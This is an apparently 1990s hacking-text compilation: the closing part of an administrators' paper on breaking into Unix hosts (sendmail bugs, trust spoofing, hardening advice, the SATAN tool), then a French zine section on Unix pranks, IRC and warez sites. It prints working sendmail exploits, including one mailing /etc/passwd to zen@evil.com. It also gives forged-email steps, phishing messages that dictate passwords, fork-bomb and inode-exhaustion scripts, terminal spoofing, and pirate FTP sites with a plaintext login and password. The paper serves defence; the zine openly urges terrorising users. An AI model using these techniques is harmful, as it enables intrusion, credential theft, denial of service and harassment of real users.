sendmail executable with a binary editor and replacing "vrfy" and "expn"
with blanks. Acquiring a recent version of sendmail (see Appendix D) is
also an extremely good idea, since there have probably been more
security bugs reported in sendmail than in any other UNIX program.
----
As a sendmail-sendoff, there are two fairly well known bugs that should
be checked into. The first was definitely fixed in version 5.59 from
Berkeley; despite the messages below, for versions of sendmail previous
to 5.59, the "evil.com" gets appended, despite the error messages, along
with all of the typical mail headers, to the file specified:
% cat evil_sendmail
telnet victim.com 25 << EOSM
rcpt to: /home/zen/.rhosts
mail from: zen
data
random garbage
.
rcpt to: /home/zen/.rhosts
mail from: zen
data
evil.com
.
quit
EOSM
evil % /bin/sh evil_sendmail
Trying 128.128.128.1
Connected to victim.com
Escape character is '^]'.
Connection closed by foreign host.
evil % rlogin victim.com -l zen
Welcome to victim.com!
victim %
The second hole, fixed only recently, permitted anyone to specify
arbitrary shell commands and/or pathnames for the sender and/or
destination address. Attempts to keep details secret were in vain, and
extensive discussions in mailing lists and usenet news groups led to
disclosure of how to exploit some versions of the bug. As with many
UNIX bugs, nearly every vendor's sendmail was vulnerable to the problem,
since they all share a common source code tree ancestry. Space
precludes us from discussing it fully, but a typical attack to get the
password file might look like this:
evil % telnet victim.com 25
Trying 128.128.128.1...
Connected to victim.com
Escape character is '^]'.
220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
mail from: "|/bin/mail zen@evil.com < /etc/passwd"
250 "|/bin/mail zen@evil.com < /etc/passwd"... Sender ok
rcpt to: nosuchuser
550 nosuchuser... User unknown
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit
Connection closed by foreign host.
evil %
At the time of writing, version 8.6.4 of sendmail (see Appendix D for
information on how to get this) is reportedly the only variant of
sendmail with all of the recent security bugs fixed.
Trust
-----
For our final topic of vulnerability, we'll digress from the practical
strategy we've followed previously to go a bit more into the theoretical
side, and briefly discuss the notion of trust. The issues and
implications of vulnerabilities here are a bit more subtle and
far-reaching than what we've covered before; in the context of this
paper we use the word trust whenever there is a situation when a server
(note that any host that allows remote access can be called a server)
can permit a local resource to be used by a client without password
authentication when password authentication is normally required. In
other words, we arbitrarily limit the discussion to clients in disguise.
There are many ways that a host can trust: .rhosts and hosts.equiv files
that allow access without password verification; window servers that
allow remote systems to use and abuse privileges; export files that
control access via NFS, and more.
Nearly all of these rely on client IP address to hostname conversion to
determine whether or not service is to be granted. The simplest method
uses the /etc/hosts file for a direct lookup. However, today most hosts
use either DNS (the Domain Name Service), NIS, or both for name lookup
service. A reverse lookup occurs when a server has an IP address (from
a client host connecting to it) and wishes to get the corresponding
client hostname.
Although the concept of how host trust works is well understood by most
system administrators, the _dangers_ of trust, and the _practical_
problem it represents, irrespective of hostname impersonation, is one of
the least understood problems we know of on the Internet. This goes far
beyond the obvious hosts.equiv and rhosts files; NFS, NIS, windowing
systems -- indeed, much of the useful services in UNIX are based on the
concept that well known (to an administrator or user) sites are trusted
in some way. What is not understood is how networking so tightly binds
security between what are normally considered disjoint hosts.
Any form of trust can be spoofed, fooled, or subverted, especially when
the authority that gets queried to check the credentials of the client
is either outside of the server's administrative domain, or when the
trust mechanism is based on something that has a weak form of
authentication; both are usually the case.
Obviously, if the host containing the database (either NIS, DNS, or
whatever) has been compromised, the intruder can convince the target
host that s/he is coming from any trusted host; it is now sufficient to
find out which hosts are trusted by the target. This task is often
greatly helped by examining where system administrators and system
accounts (such as root, etc.) last logged in from. Going back to our
target, victim.com, you note that root and some other system accounts
logged in from big.victim.com. You change the PTR record for evil.com so
that when you attempt to rlogin in from evil.com to victim.com,
victim.com will attempt to look up your hostname and will find what you
placed in the record. If the record in the DNS database looks like:
1.192.192.192.in-addr.arpa IN PTR evil.com
And you change it to:
1.192.192.192.in-addr.arpa IN PTR big.victim.com
then, depending on how naive victim.com's system software is, victim.com
will believe the login comes from big.victim.com, and, assuming that
big.victim.com is in the /etc/hosts.equiv or /.rhosts files, you will be
able to login without supplying a password. With NIS, it is a simple
matter of either editing the host database on the NIS master (if this is
controlled by the intruder) or of spoofing or forcing NIS (see
discussion on NIS security above) to supply the target with whatever
information you desire. Although more complex, interesting, and
damaging attacks can be mounted via DNS, time and space don't allow
coverage of these methods here.
Two methods can be used to prevent such attacks. The first is the most
direct, but perhaps the most impractical. If your site doesn't use any
trust, you won't be as vulnerable to host spoofing. The other strategy
is to use cryptographic protocols. Using the secure RPC protocol (used
in secure NFS, NIS+, etc.) is one method; although it has been "broken"
cryptographically, it still provides better assurance than RPC
authentication schemes that do not use any form of encryption. Other
solutions, both hardware (smartcards) and software (Kerberos), are being
developed, but they are either incomplete or require changes to system
software.
Appendix B details the results of an informal survey taken from a
variety of hosts on the Internet.
Protecting the system
---------------------
It is our hope that we have demonstrated that even some of the most
seemingly innocuous services run can offer (sometimes unexpectedly)
ammunition to determined system crackers. But, of course, if security
were all that mattered, computers would never be turned on, let alone
hooked into a network with literally millions of potential intruders.
Rather than reiterating specific advice on what to switch on or off, we
instead offer some general suggestions:
o If you cannot turn off the finger service, consider installing a
modified finger daemon. It is rarely necessary to reveal a user's home
directory and the source of last login.
o Don't run NIS unless it's absolutely necessary. Use NFS as little
as possible.
o Never export NFS filesystems unrestricted to the world. Try to
export file systems read-only where possible.
o Fortify and protect servers (e.g. hosts that provide a service to
other hosts -- NFS, NIS, DNS, whatever.) Only allow administrative
accounts on these hosts.
o Examine carefully services offered by inetd and the portmapper.
Eliminate any that aren't explicitly needed. Use Wietse Venema's inetd
wrappers, if for no other reason than to log the sources of connections
to your host. This adds immeasurably to the standard UNIX auditing
features, especially with respect to network attacks. If possible, use
the loghost mechanism of syslog to collect security-related information
on a secure host.
o Eliminate trust unless there is an absolute need for it. Trust is
your enemy.
o Use shadow passwords and a passwd command that disallows poor
passwords. Disable or delete unused/dormant system or user accounts.
o Keep abreast of current literature (see our suggested reading list and
bibliography at the end of this paper) and security tools; communicate
to others about security problems and incidents. At minimum, subscribe
to the CERT mailing list and phrack magazine (plus the firewalls mailing
list, if your site is using or thinking about installing a firewall) and
read the usenet security newsgroups to get the latest information on
security problems. Ignorance is the deadliest security problem we are
aware of.
o Install all vendor security patches as soon as possible, on all of
your hosts. Examine security patch information for other vendors - many
bugs (rdist, sendmail) are common to many UNIX variants.
It is interesting to note that common solutions to security problems
such as running Kerberos or using one-time passwords or digital tokens
are ineffective against most of the attacks we discuss here. We
heartily recommend the use of such systems, but be aware that they are
_not_ a total security solution -- they are part of a larger struggle to
defend your system.
Conclusions
-----------
Perhaps none of the methods shown here are surprising; when writing this
paper, we didn't learn very much about how to break into systems. What
we _did_ learn was, while testing these methods out on our own systems
and that of friendly sites, just how effective this set of methods is
for gaining access to a typical (UNIX) Internet host. Tiring of trying
to type these in all by hand, and desiring to keep our own systems more
secure, we decided to implement a security tool (SATAN) that attempts to
check remote hosts for at least some of the problems discussed here.
The typical response, when telling people about our paper and our tool
was something on the order of "that sounds pretty dangerous -- I hope
you're not going to give it out to everybody. But you since you can
trust me, may I have a copy of it?"
We never set out to create a cookbook or toolkit of methods and programs
on how to break into systems -- instead, we saw that these same methods
were being used, every day, against ourselves and against friendly
system administrators. We believe that by propagating information that
normally wasn't available to those outside of the underworld, we can
increase security by raising awareness. Trying to restrict access to
"dangerous" security information has never seemed to be a very effective
method for increasing security; indeed, the opposite appears to be the
case, since the system crackers have shown little reticence to share
their information with each other.
While it is almost certain that some of the information presented here
is new material to (aspiring) system crackers, and that some will use it
to gain unauthorized entrance onto hosts, the evidence presented even by
our ad hoc tests shows that there is a much larger number of insecure
sites, simply because the system administrators don't know any better --
they aren't stupid or slow, they simply are unable to spend the very
little free time that they have to explore all of the security issues
that pertain to their systems. Combine that with no easy access to this
sort of information and you have poorly defended systems. We (modestly)
hope that this paper will provide badly-needed data on how systems are
broken into, and further, to explain _why_ certain steps should be taken
to secure a system. Knowing why something is a problem is, in our
opinion, the real key to learning and to making an informed, intelligent
choice as to what security really means for your site.
----
Appendix A:
SATAN (Security Analysis Tool for Auditing Networks)
Originally conceived some years ago, SATAN is actually the prototype of
a much larger and more comprehensive vision of a security tool. In its
current incarnation, SATAN remotely probes and reports various bugs and
weaknesses in network services and windowing systems, as well as
detailing as much generally useful information as possible about the
target(s). It then processes the data with a crude filter and what
might be termed an expert system to generate the final security
analysis. While not particularly fast, it is extremely modular and easy
to modify.
SATAN consists of several sub-programs, each of which is an executable
file (perl, shell, compiled C binary, whatever) that tests a host for a
given potential weakness. Adding further test programs is as simple as
putting an executable into the main directory with the extension ".sat";
the driver program will automatically execute it. The driver generates
a set of targets (using DNS and a fast version of ping together to get
"live" targets), and then executes each of the programs over each of the
targets. A data filtering/interpreting program then analyzes the
output, and lastly a reporting program digests everything into a more
readable format.
The entire package, including source code and documentation, will be
made freely available to the public, via anonymous ftp and by posting it
to one of the numerous source code groups on the Usenet.
----
Appendix B:
An informal survey conducted on about a dozen Internet sites
(educational, military, and commercial, with over 200 hosts and 40000
accounts) revealed that on the average, close to 10 percent of a site's
accounts had .rhosts files. These files averaged six trusted hosts
each; however, it was not uncommon to have well over one hundred entries
in an account's .rhosts file, and on a few occasions, the number was
over five hundred! (This is not a record one should be proud of
owning.) In addition, _every_ site directly on the internet (one site
was mostly behind a firewall) trusted a user or host at another site --
thus, the security of the site was not under the system administrators
direct control. The larger sites, with more users and hosts, had a
lower percentage of users with .rhosts files, but the size of .rhosts
files increased, as well as the number of trusted off-site hosts.
Although it was very difficult to verify how many of the entries were
valid, with such hostnames such as "Makefile", "Message-Id:", and
"^Cs^A^C^M^Ci^C^MpNu^L^Z^O", as well as quite a few wildcard entries, we
question the wisdom of putting a site's security in the hands of its
users. Many users (especially the ones with larger .rhosts files)
attempted to put shell-style comments in their .rhosts files, which most
UNIX systems attempt to resolve as valid host names. Unfortunately, an
attacker can then use the DNS and NIS hostname spoofing techniques
discussed earlier to set their hostname to "#" and freely log in. This
puts a great many sites at risk (at least one major vendor ships their
systems with comments in their /etc/hosts.equiv files.)
You might think that these sites were not typical, and, as a matter of
fact, they weren't. Virtually all of the administrators knew a great
deal about security and write security programs for a hobby or
profession, and many of the sites that they worked for did either
security research or created security products. We can only guess at
what a "typical" site might look like.
----
Appendix C:
After receiving mail from a site that had been broken into from one of
our systems, an investigation was started. In time, we found that the
intruder was working from a list of ".com" (commercial) sites, looking
for hosts with easy-to steal password files. In this case,
"easy-to-steal" referred to sites with a guessable NIS domainname and an
accessible NIS server. Not knowing how far the intruder had gotten, it
looked like a good idea to warn the sites that were in fact vulnerable
to password file theft. Of the 656 hosts in the intruder's hit list, 24
had easy-to-steal password files -- about one in twenty-five hosts! One
third of these files contained at least one password-less account with
an interactive shell. With a grand total of 1594 password-file entries,
a ten-minute run of a publically-available password cracker (Crack)
revealed more than 50 passwords, using nothing but a low-end Sun
workstation. Another 40 passwords were found within the next 20
minutes; and a root password was found in just over an hour. The result
after a few days of cracking: five root passwords found, 19 out of 24
password files (eighty percent) with at least one known password, and
259 of 1594 (one in six) passwords guessed.
----
Appendix D:
How to get some free security resources on the Internet
Mailing lists:
o The CERT (Computer Emergency Response Team) advisory mailing list.
Send e-mail to cert@cert.org, and ask to be placed on their mailing
list.
o The Phrack newsletter. Send an e-mail message to
phrack@well.sf.ca.us and ask to be added to the list.
o The Firewalls mailing list. Send the following line to
majordomo@greatcircle.com:
subscribe firewalls
o Computer Underground Digest. Send e-mail to
tk0jut2@mvs.cso.niu.edu, asking to be placed on the list.
Free Software:
COPS (Computer Oracle and Password System) is available via anonymous
ftp from archive.cis.ohio-state.edu, in pub/cops/1.04+.
The tcp wrappers are available via anonymous ftp from ftp.win.tue.nl,
in pub/security.
The latest version of berkeley sendmail is available via anonymous ftp
from ftp.cs.berkeley.edu, in ucb/sendmail.
Sources for ftpd and many other network utilities can be found in
ftp.uu.net, in packages/bsd-sources.
Source for ISS (Internet Security Scanner), a tool that remotely scans
for various network vulnerabilities, is available via anonymous ftp from
ftp.uu.net, in usenet/comp.sources.misc/volume40/iss.
Securelib is available via anonymous ftp from ftp.uu.net, in
usenet/comp.sources.misc/volume36/securelib.
----
Bibliography:
Baldwin, Robert W., Rule Based Analysis of Computer Security,
Massachusetts Institute of Technology, June 1987.
Bellovin, Steve, Using the Domain Name System for System Break-ins,
1992 (unpublished).
Massachusetts Institute of Technology, X Window System Protocol,
Version 11, 1990.
Shimomura, Tsutomu, private communication.
Sun Microsystems, OpenWindows V3.0.1 User Commands, March 1992.
----
Suggested reading:
Bellovin, Steve -- "Security Problms in the TCP/IP Protocol Suite",
Computer Communication Review 19 (2), 1989; a comment by Stephen
Kent appears in volume 19 (3), 1989.
Garfinkle, Simson and Spafford, Gene, "Practical UNIX Security",
O'Reilly and Associates, Inc., 1992.
Hess, David, Safford, David, and Pooch, Udo, "A UNIX Network Protocol
Study: Network Information Service", Computer Communication Review
22 (5) 1992.
Phreak Accident, Playing Hide and Seek, UNIX style, Phrack, Volume
Four, Issue Forty-Three, File 14 of 27.
Ranum, Marcus, "Firewalls" internet electronic mailing list, Sept
1993.
Schuba, Christoph, "Addressing Weaknesses in the Domain Name System
Protocal", Purdue University, August 1993.
Thompson, Ken, Reflections on Trusting Trust, Communications of the ACM
27 (8), 1984.
-%!% N0 Way %!%-
Volume I, Numéro 3, Partie 3.12
o/~ Paranoia ! o/~ Paranoia o/~
---===***###> Plaisanter sous Unix <###***===---
o/~ They are Back ! o/~
Vous vous etes toujours demandé comment jouer des farces sous Unix,
comment foutres les boules a vos potes, a votre administrateur, jouer au con
avec le psyche des autres, faire du SEAO? Eh bien voila le but de cet autre
petit ++N-Phile. Amusez vous bien !
[ nota : tout ce qui est tapé au clavier est précédé de ">>>" ]
> Mailer sous un autre nom:
========================
Pour cela, il faut connaitre les bases du transfer de mail. Le mail sous Unix
est transporte de machine en machine par "sendmail" qui écoute les messages des
autres mailers ou de ses clients sur le port TCP numéro 25.
DaubeNet {101} grep smtp /etc/services
smtp 25/tcp mail
Donc il suffit de se connecter la bas et de respecter le protocole SMTP
(Simple Message Transfer Protocol) plus une petite astuce pour faire un faux
mail qui pourrait venir de n'importe ou.
----------------------
DaubeNet {102} >>> telnet localhost 25
Trying 127.0.0.1...
Connected to univ-anon.fr.
Escape character is '^]'.
220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 15 Sep 1994 03:51:55 -0600
220 ESMTP spoken here
>>>help
214-Commands:
214- HELO EHLO MAIL RCPT DATA
214- RSET NOOP QUIT HELP VRFY
214- EXPN VERB
214-For more info use "HELP <topic>".
214-To report bugs in the implementation send email to
214- sendmail@CS.Berkeley.EDU.
214-For local information send email to Postmaster at your site.
214 End of HELP info
>>>help helo
214-HELO <hostname>
214- Introduce yourself.
214 End of HELP info
>>>help mail
214-MAIL FROM: <sender>
214- Specifies the sender.
214 End of HELP info
>>>help rcpt
214-RCPT TO: <recipient>
214- Specifies the recipient. Can be used any number of times.
214 End of HELP info
>>>help data
214-DATA
214- Following text is collected as the message.
214- End with a single dot.
214 End of HELP info
>>>help quit
214-QUIT
214- Exit sendmail (SMTP).
214 End of HELP info
>>>quit
221 DaubeNet closing connection
Connection closed by foreign host.
----------------------
Voila dans l'ordre les syntaxe des commandes que l'on va utiliser poru forger
un mail. C'est träs facile mais il y a une bidouille qu'il faut connaitre et
qui vous trahi si vous ne la connaissez pas.
----------------------
DaubeNet {103} >>> telnet localhost 25
Trying 127.0.0.1...
Connected to univ-anon.fr.
Escape character is '^]'.
220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 15 Sep 1994 03:52:53 -0600
220 ESMTP spoken here
>>>helo ducon.fbi.com
250 DaubeNet Hello univ-anon.fr [127.0.0.1], pleased to meet you
>>>mail from: root@ducon.fbi.com
250 root@ducon.fbi.com... Sender ok
>>>rcpt to: fred
250 fred... Recipient ok
>>>data
354 Enter mail, end with "." on a line by itself
>>>
>>>Please, would you stop playing with my Unix system otherwise i'll
>>>send a wet operation commando to your university.
>>>
>>>Nigel X.
>>>System Administrator at FBI Inc.
>>>root@fbi.com
>>>.
250 DAA00299 Message accepted for delivery
>>>quit
221 DaubeNet closing connection
Connection closed by foreign host.
----------------------
Haha, ca y est, on a envoyé notre petite bidouille et le mec va avoir les
jetons de sa vie:
----------------------
DaubeNet {104} >>> mail
Mail version 5.5 6/1/90. Type ? for help.
"/var/mail/fred": 1 message 1 new
>N 1 root@ducon.fbi.com Thu Sep 15 03:55 14/508
& >>>1
Message 1:
From root@ducon.fbi.com Thu Sep 15 03:55:03 1994
From: root@ducon.fbi.com
Apparently-To: fred [ * ]
Please, would you stop playing with my Unix system otherwise i'll
send a wet operation commando to your university.
Nigel X.
System Administrator at FBI Inc.
root@fbi.com
& >>>d
& >>>q
----------------------
Arghh... Vous avez vu comme moi la ligne ou j'ai mis une astérisque entre
crochets : C'est marqué: "Apparently-To: " arghhh... Ca fait vraiment pas
serieux n'est ce pas?
C'est ce qui vous trahi quand vous ne connaissez pas la bidouille.
Et en parlant de bidouille, la voici...
----------------------
DaubeNet {105} >>> telnet localhost 25
Trying 127.0.0.1...
Connected to univ-anon.fr.
Escape character is '^]'.
220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 15 Sep 1994 03:55:43 -0600
220 ESMTP spoken here
>>>helo
250 DaubeNet Hello univ-anon.fr [127.0.0.1], pleased to meet you
>>>mail from: root@fbi.com
250 root@fbi.com... Sender ok
>>>rcpt to: fred
250 fred... Recipient ok
>>>data
354 Enter mail, end with "." on a line by itself
>>>To: fred@univ-anon.fr [ * ]
>>>
>>>Good afternoon,
>>>
>>> Could you please stop playing with my unix system otherwise i'll
>>>be forced to send one of our wet operations' commando to execute you.
>>>
>>>Nigel X, System Administrator at Fbi Inc.
>>>.
250 DAA00307 Message accepted for delivery
>>>quit
221 DaubeNet closing connection
Connection closed by foreign host.
----------------------
Vous regarderez attentivement la premiere ligne tapée apräs le DATA.
C'est un "To: " suivi de l'adresse a qui on envoie...
Et voila le résultat:
----------------------
DaubeNet {106} >>> mail
Mail version 5.5 6/1/90. Type ? for help.
"/var/mail/fred": 1 message 1 new
>N 1 root@fbi.com Thu Sep 15 03:57 14/509
& >>>1
Message 1:
From root@fbi.com Thu Sep 15 03:57:41 1994
From: root@fbi.com
To: fred@univ-anon.fr
Good afternoon,
Could you please stop playing with my unix system otherwise i'll
be forced to send one of our wet operations' commando to execute you.
Nigel X, System Administrator at Fbi Inc.
& >>>d
& >>>q
DaubeNet {107} exit
----------------------
C'est beau non la technique... ;)
Grace à cela vous pouvez commencer à lancer la terreur sur votre réseau.
Hacking Psychology:
==================
Les utilisateurs sont par définition träs soumis (et c'est pour cela
que l'on distingue les hackers, ils refusent cette soumission.) Pour un user
lambda, tout ce qui vient du Mail est vrais, sacre et tout alors que n'importe
qui peut faire du faux mail...
Bien sur, on peut faire des mail bombs de 800 kilo octets qui vont
completement flooder toute la boite aux lettre de votre/vos victime(s).
Mais il y a plus interressant.
Imaginez que quelqu'un recoive un message de: security-daemon@<votre site>
disant:
-----
* This is and automated mailing : don't reply *
We have found that your password is insecure. You should change this
otherwise your account will be disabled.
Please use the password "ItG-4v3" instead.
Thank you.
Security Daemon.
-----
Ainsi, vous pouvez donner beaucoup de passwords et ainsi controller pas mal de
comptes. Une fois, j'ai réussi màme à faire changer le mot de passe de
*l'admin* !!!!! Quel con, il obéit à des packages de sécurité qu'il n'a màme
pas installé. AHahaha !
Foutre un systeme sur les genoux:
================================
Pour cela il y a des petits trucs tout con à faire si vous n'avez pas
d'accounting:
créez un petit script "toto" de ce type:
#!/bin/sh
mkdir ./-fuck
cp ./toto ./-fuck/toto
cd ./-fuck
./toto
Hehe, le truc va faire de plus en plus de directory et la machine s'arretera
par manque d'inode.
On peut aussi faire dans le meme genre un fichier "foo":
#!/bin/csh
./foo &
./foo &
./foo &
hehe, effet tout aussi garanti...
On peut màme mixer les deux !
Les messages fantomes:
=====================
Vous savez, quand vous faites un write la personne à qui il est déstiné
recoit:
Message from <luser> at/...
Ca serait marrant si vous pouviez vous faire passer pour d'autres personnes
non??
Eh bien c'est possible:
Il faut savoir comment ca marche. Chaque utilisateur loggé a au moins un
terminal. Ce terminal est représenté dans le systäme Unix comme un nom de
périphérique du type: /dev/ttyXX ou XX est généralement un nombre ou une lettre
et un nombre.
Bref, c'est la dessus qu'écrit la commande write.
Le "msg on" ou "msg off" que l'on tape modifie simplement la protection en
écriture sur ce périphérique. Sur les anciens systäme, l'appel systäme
vhangup() n'éxistait pas et on pouvait donc se connecter, regarder les
terminaux disponibles (nons attribués à des users donc en lecture et ecriture
pour tout le monde) et faire un cat dessus comme ceci:
$ cat >/dev/tty02
ensuite faire un control-Z pour le stopper et attendre que quelqu'un se logge
par ce terminal.
Ensuite, préparer a coté le :
Message from root at...
Veuillez changer immédiatement votre mot de passe en: "TuY5;tK"
Merci. Votre administrateur systäme.
<EOT>
Fun isn't it?
S'amuser avec les émulateurs de terminaux:
=========================================
Vous savez que par exemple zmodem envoie une chaine de caractäre qui
lance automatiquement Zmodem en reception du cote de l'émulateur de terminaux.
C'est träs interressant car on peut faire appeler intempestivement Zmodem dans
l'émulateur si telle ou telle personne en message on utilise un émulateur de
terminaux.
Il suffit d'enregistrer la séquence envoyée par Zmodem pour déclancher l'appel
de Zmodem et hop, bienvenue en enfer !
Un petit programe fait cela entre autre dans les sessions Talk, c'est flash2.c
et son ancetre qui ne le fait pas mais est sympa: flash.c.
-%!% N0 Way %!%-
Volume I, Numéro 3, Partie 3.13
^^^^^^^^^^^^^^^^^^^^^^^^^
>>>>>>>> du cote <<<<<<<<
======= d'internet ======
vvvvvvvvvvvvvvvvvvvvvvvvv
Chez les internetiens, ca a bougé sacrement, apres les emmerde de Philip
Zimmerman accusé par la NSA et la CIA d'avoir exporté un logiciel de
cryptographie (PGP) les hackers se sont mis a remuer sec.
Le probleme de PGP a été résolu, la version 2.5 est interdite à l'export
mais la 2.6 est okay et exportable !
STICK WITH 2.5, IT'S THE MOST SECURE!
Les experts en sécurité d'une grosse agence francaise ont déclaré recemment:
"On leur a bien fait la nique"...
J'ai bien peur que la plus grosse "nique" ce soit nous qui la faisions
prochainnement. En effet, beaucoup de jeunes hackers se sont lancés a fond
dans le hack professionel.
Grace à des listes de diffusions comme 8lgm et bugtraq, ils ont acqui un
savoir faire impressionant. A suivre...
| Underground sites |
Sur Internet, il y a des serveurs FTP ou FSP qui hébergent sans le
savoir des sanctuaires du hacking ou de la scene 0-day warez.
Voici une petite liste qui a été récuperée aux USA:
============
----++++ Betaz List ++++----
-= These sites are up 9.05.94 =-
------------------------------------------------------------------------------
FTP
~~~
sy2000.cet.fsu.edu /incoming/msdos/.<tab>/.^l^k pc|mac|fast
cs.uidaho.edu /pub/incoming/MacPGP/"<tab><tab>" pc|mac
130.246.23.9 /pub/others/".. "/".. " pc|mac
130.246.17.54 /pub/".. "/".cache " " "
brinta.ptf.hro.nl ** Private **
160.78.31.26 /incoming/".. " pc
ic16.ee.umanitoba.ca /pub/PSCAD_RTDS/incoming/te few
acme.fred.org /pub/msdos/Tmp/^X few
Console
~~~~~~~
syr.edu /software/unix/kip/dpf snes|sega
131.215.46.20 1717 snesapalooza
To add to or recieve an updated list
mail an112452 or msg betaz on irc
============
Voila, donc vous pouvez aller y faire des tours, c'est pas mal.
Ce sont des warez en general de bonne qualité.
Et voila une autre liste:
============
FDISK and FERN's Warez List 9:09PM 8/24/94 Atlantic FDISK V5.6
All of the sites have been test as of the date and time above
FTP
Site Dir Submitted By
--------------------------------------------------------------------
corto.inria.fr /broadcast/^K^E^F^E^L Skippy
tiger.vut.edu.au login:r9202044 Pass:Daavee ".. "
192.54.41.33 /pub/avs_mirror/pub/siggraph/uploads/"..." cc
acme.fred.org /pub/msdos/tmp/".. " swazi
130.246.23.9 /pub/others Hi-Fi
Site Port Submitted By
--------------------------------------------------------------------
130.161.39.3 5300 Wowzer
128.206.29.11 12321 Bryer
158.132.79.228 1997 casey(anon 10285)
============
| IRC |
Vous connaissez IRC? L'Internet Relay Chat... C'est le havre dans
lequel tous les internet junkies viennent discuter de n'importe quoi.
Un des "channel" les plus virulent est #hack (suivi de pres par #warez et
#phreak). La dedans se livre une petite guerre permanente à qui aura les
droits operateurs sur le channel, pour cela, nous avons recours à des outils
assez rigolos. Tout d'abord, chaque bon hacker qui se respecte a sa propre
armure personnelle le protegeant des divers Tsunamis ou Rolling Bombs qui ne
sont que des attaques software destinées à virer quelqu'un du channel.
Les plus connus de ces logiciels sont GargOyle et Serpent de Vassago, personnage
tres controversé sur Internet.
(gargoyle.tar.Z, serpent.tar.Z, ircdfens.tar.Z, util662.tar.Z, textbox.tar.Z)
Ensuite vient le hack hard qui passe souvent par l'arret de serveur IRC
isolant un connecte de l'ensemble des autres connecte et qui donne ainsi les
chanops (channel operators) au connecte isole.
Fun isn't it?
La pluspart du temps vous ne trouverez personne d'interessant au premier abord
sur #hack. Mais de nombreuses personnes interressantes y passent souvent.
Donc la premiere impression de conneries inutiles n'est pas forcemment vraie
pour tout le monde.
Comment se connecter sur IRC?
- - - - - - - - - - - - - - -
Eh bien tout d'abord il vous faut un client IRC que vous compilerez
pour votre unix (si vous avez un PC sous SLIP et PPP, il vous faudra chercher
un client IRC pour PC). Ensuite, vous devrez trouver un serveur IRC qui
marche dans votre coins (pas trop loin dans le reseau) et qui vous accepte en
tant que connecte. Si vous prenez un serveur irc trop loin (comptez la
"distance" avec traceroute), vous aurez des delais dans votre dialogue.
Il vous faut aussi et bien sur un acces Internet.
Une fois que vous aurez fixé tout cela, vous pourrez vous connecter sur IRC.
Comment utiliser?
- - - - - - - - -
Les commandes IRC sont assez simple. Je vous conseille de prendre un
client IRC II car ils permettent vraiment des choses tres cool. Ils vous
permettent par exemple de faire du transfert de fichier avec quelqu'un en
restant connecte sur le chat et en continuant de discuter.
On change son nickname (pseudo) avec: /NICK <nouveau nickname>
On va dans un channel en faisant: /join #<nom du channel>
Les noms de channels commencent toujours par #
On quitte un channel en faisait: /leave <channel>
On sort du client en faisant: /exit
On envoie un message prive non securise à quelqu'un: /msg <nickname> <message>
On regarde qui il y a dans le channel avec: /who #<channel>
voila les commandes de base.
Explication du fonctionnement du reseau IRC.
- - - - - - - - - - - - - - - - - - - - - -
On utilise l'IRC avec un client qui se connecte à un serveur IRC.
Ce serveur IRC est connecte à d'autres serveurs IRC. Ainsi, il y a un traffic
moins important car l'information est distribuee sur les serveurs IRC. Si
chacun choisit un serveur IRC proche de chez lui (pas beaucoup de internet hop,
les saut de puces que l'on voit avec traceroute), les liaisons internationales
ne seront utilisées que par les serveurs et donc pas de gaspillage!
Ainsi on aura:
Client Client Client
Client__ | `\ |
`\ | `\ |
`\ | `\ |
Client----IrcServ3==========IrcServ4=====IrcServ5-----Client
|| \
|| \
|| \
Client----IrcServ2==========IrcServ1 Client
| |
| |
Client Client
Si il y une coupure reseau entre IrcServ1 et IrcServ2 le user connecte sur
IrcServ1 n'aura plus qu'a quitter et revenir dans le channel en question et
des a present il aura les chanops sur le reseau car IrcServ1 croit alors qu'il
est tout seul dans le reseau puisqu'il ne voit pas les autres au dela de la
coupure reseau (que l'on appelle netsplit).
Ainsi, des que la connection entre IrcServ 1 et 2 reviendra, le Client de
IrcServ 1 sera chanop et le restera : il sera devenu chanops.
Donc le jeu est pour certain de devenir chanop et de faire "tomber" la liaison
entre son serveur local et le serveur qui fournit le feed IRC a son serveur
local. Je sais, c'est vicieux mais a la fin ca n'a plus d'interet tant c'est
commun sur Irc.
Au niveau des chanops, il faut savoir que le premier qui se connecte
dans un channel deviens automatiquement le maitre du channel avec ses chanops.
Il peut ainsi:
- ejecter quelqu'un du channel (/kick <nickname>)
- modifier le sujet (topic) du channel (/topic #<channel> <new topic>)
- rendre operateur quelqu'un d'autre (/mode +o <nickname>)
- enlever l'operateur à quelqu'un (/mode -o <nickname>)
- modifier les droits d'acces au channel (on peut banir du channel certainnes
personnes, certainnes adresses etc...)
Quelques conseils:
- - - - - - - - -
Ne tapez pas tout ce que l'on vous dit de taper et surtout ne tapez
pas des trucs du style /ON ou /EXEC car si vous etes sous Unix, cela vous fera
executer des choses qui peuvent àtre des backdoor pour revenir sur votre suite
ensuite.
Evitez de faire chier les personnes avec un @ devant leur nom, ce sont
les chanops!
Avant d'utiliser un script Irc II que l'on vous envoie, verifiez bien
qu'il ne contient pas de backdoor!
Voila !
- - - -
Vous voila pràt pour aborder l'IRC sans difficulté! Attention, on
devient vite accro a ce service de l'internet.
Peut etre demanderez vous un jour en vous debranchant de votre NeuroPrise (tm)
"y a t'il une vie apräs l'IRC?"
++NeurAlien.
| Internet for the masses |
La France était (JE DIS BIEN ETAIT) sérieusement dans la merde car
aucun acces public à l'Internet n'était disponible à des prix abordables.
Bien sur il y avait des passes droits accordés à certains privilégié qui
bénéficiaient de l'acces d'un université ou d'un institut pour utiliser
Internet.
Depuis quelques mois, il semble que tout ait un peu changé.
Il est apparu d'abord des services minitels proposant mail et news. Bien sur,
ce genre de service est une vraie arnaque car il ne fournit pas quelque chose
d'agréable (vous avez deja les news a 1200/75 bauds????). De plus, ils se
sont avere de qualité assez médiocre. Pour n'en citer que quelques uns, ya
TEASER et sa floppée de services paralläle destiné à se faire du fric sans se
préocupper des connectés (Sniifff Sniiff... mais oui, je reconnais cette odeur
de pourriture... mais c'est... c'est.... c'est J.. et C...) et les services
EMAIL, INTERNET etc...
Ensuite ya des trucs largement plus serieux qui se sont monté. On a
tout d'abord entendu parler de boites qui voulaient faire du dialup IP.
Ma premiäre réaction a été:
"Et merde, ca y est, encore des arnaqueurs qui viennent squatter une de ces
derniere place de liberté qu'est l'Internet".
Alors on a vu apparaitre en premier un truc appelé World-Net. Ne
voulant pas juger à la légäre, j'ai demandé des infos et voila:
